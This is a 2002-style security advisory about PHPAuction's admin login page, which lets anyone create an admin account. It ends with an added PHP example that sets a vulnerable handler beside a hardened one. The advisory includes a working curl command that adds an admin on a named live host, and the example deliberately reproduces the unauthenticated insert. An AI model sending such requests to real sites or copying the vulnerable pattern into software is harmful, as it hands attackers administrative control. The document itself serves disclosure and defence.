COMMAND

    PHPAuction allows anyone to create an admin account for this software

SYSTEMS AFFECTED

    All releases up till today (03 July 2002) ?

PROBLEM

    ethx says :

    File /admin/login.php checks only that there is $action set to "insert" and then goes ahead and inserts username and password (if both are provided) in adminUsers table.

    The following line added admin user with username test and password test

        curl http://pro.phpauction.org/proplus/admin/login.php -d "action=insert" -d "username=test" -d "password=test"

SOLUTION

    None yet
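
The missing check described under PROBLEM, next to one way to close it. This is an added example, not PHPAuction's code: only the adminUsers table name comes from the advisory, while the column names, the function names, the session key admin_id, the password storage and the first-run exception are assumptions.

```php
<?php
// Added example, not PHPAuction's code. The adminUsers table name is from the
// advisory; column names, function names and password storage are assumptions.

// Behaviour as described: action=insert plus both fields creates an admin.
function handle_vulnerable(PDO $db, array $post): bool
{
    if (($post['action'] ?? '') === 'insert'
        && !empty($post['username']) && !empty($post['password'])) {
        $stmt = $db->prepare('INSERT INTO adminUsers (username, password) VALUES (?, ?)');
        return $stmt->execute([$post['username'], $post['password']]);
    }
    return false;
}

// Hardened form: inserting an admin needs an authenticated admin session,
// except during first-run setup while adminUsers is still empty (assumption).
function handle_hardened(PDO $db, array $post, array $session): bool
{
    if (($post['action'] ?? '') !== 'insert'
        || empty($post['username']) || empty($post['password'])) {
        return false;
    }
    $existing = (int) $db->query('SELECT COUNT(*) FROM adminUsers')->fetchColumn();
    if ($existing > 0 && empty($session['admin_id'])) {
        return false; // admins already exist and the caller is not one of them
    }
    $hash = password_hash($post['password'], PASSWORD_DEFAULT);
    $stmt = $db->prepare('INSERT INTO adminUsers (username, password) VALUES (?, ?)');
    return $stmt->execute([$post['username'], $hash]);
}

// Constructed demo on an in-memory SQLite database with one existing admin.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE adminUsers (id INTEGER PRIMARY KEY, username TEXT, password TEXT)');
$db->exec("INSERT INTO adminUsers (username, password) VALUES ('owner', 'placeholder')");

$request = ['action' => 'insert', 'username' => 'test', 'password' => 'test'];
var_dump(handle_vulnerable($db, $request));                   // no session consulted
var_dump(handle_hardened($db, $request, []));                 // anonymous caller
var_dump(handle_hardened($db, $request, ['admin_id' => 1]));  // authenticated admin
```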